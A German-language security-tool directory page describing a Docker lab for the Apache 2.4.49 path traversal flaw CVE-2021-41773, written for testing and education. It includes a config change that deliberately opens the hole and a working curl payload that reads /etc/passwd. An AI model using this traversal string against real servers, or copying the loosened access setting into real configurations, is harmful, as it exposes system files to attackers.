Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2021-41773 — Docker-basierte Laborumgebung für die CVE-2021-41773 Apache-Pfad-Traversal-Sicherheitslücke mit PoC-Exploit und detaillierter Anleitung für Sicherheitstests und Bildung. | Kitploit
Tools/GitHubGitHub/jiyun02/cve-2021-41773
SchwachstellenanalyseExploitationWebsicherheitPenetrationstestsLernen & BildungLabs & Praxis
GitHubjiyun02/cve-2021-41773

cve-2021-41773

Docker-basierte Laborumgebung für die CVE-2021-41773 Apache-Pfad-Traversal-Sicherheitslücke mit PoC-Exploit und detaillierter Anleitung für Sicherheitstests und Bildung.

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-41773 – Apache Path Traversal Bericht


Zusammenfassung

  • Schwachstelle in Apache HTTP Server 2.4.49, die je nach Webserver-Konfiguration durch einen Path-Traversal-Angriff den Zugriff auf sensible Systemdateien ermöglicht
  • Path Traversal: Ein Angreifer kann Pfade mit ../ verwenden, um auf Dateien außerhalb des Web-Stammverzeichnisses zuzugreifen

Informationen

  • Schwachstellenname: CVE-2021-41773
  • Betroffene Version: Apache HTTP Server 2.4.49
  • Schwachstellentyp: Path Traversal
  • Offizieller Patch: In Version 2.4.50 und höher behoben

Aufbau der Übungsumgebung

  • Basis-Image: 'httpd:2.4.49' (DockerHub)
  • Container-Betrieb: Dockerfile + docker-compose.yml
  • Ausführungsport: 8080 → Weiterleitung zum Port 80 des Containers
  • Apache-Konfigurationsänderung: 'Require all granted' (ermöglicht Path Traversal)

Ausführung der Umgebung

  • git clone https://github.com/JIYUN02/cve-2021-41773.git
  • cd cve-2021-41773
  • docker-compose up --build

PoC der Schwachstelle

  • curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

Detaillierter Ablauf

  1. Verzeichnis für die Aufgabe ausführen image
image
  1. Dockerfile erstellen image

-> Basis-Image: httpd:2.4.49 (Version mit der Schwachstelle)

-> 'sed -i 's/Require all denied/Require all granted/g' : Path Traversal erlauben und externen Zugriff ermöglichen

  1. docker-compose.yml image

-> Apache definieren

-> Port 8080 auf den Container-Port 80 mappen

  1. docker ausführen

    image
  2. PoC ausführen

    image

-> curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

-> /etc/passwd enthält sensible Informationen; %2e ist die kodierte Version von .., was den Aufstieg in übergeordnete Verzeichnisse bewirkt

-> Durch Pfadmanipulation wird der Server gezwungen, auf /etc/passwd zuzugreifen und diese Datei auszugeben

  1. Ausführungsergebnis image

-> Wie im Bild zu sehen, kann auf sensible Verzeichnisse zugegriffen werden


Repository-URL (über Fork zugänglich)

https://github.com/JIYUN02/cve-2021-41773

-> Commit-Verlauf vorhanden

Tool herunterladen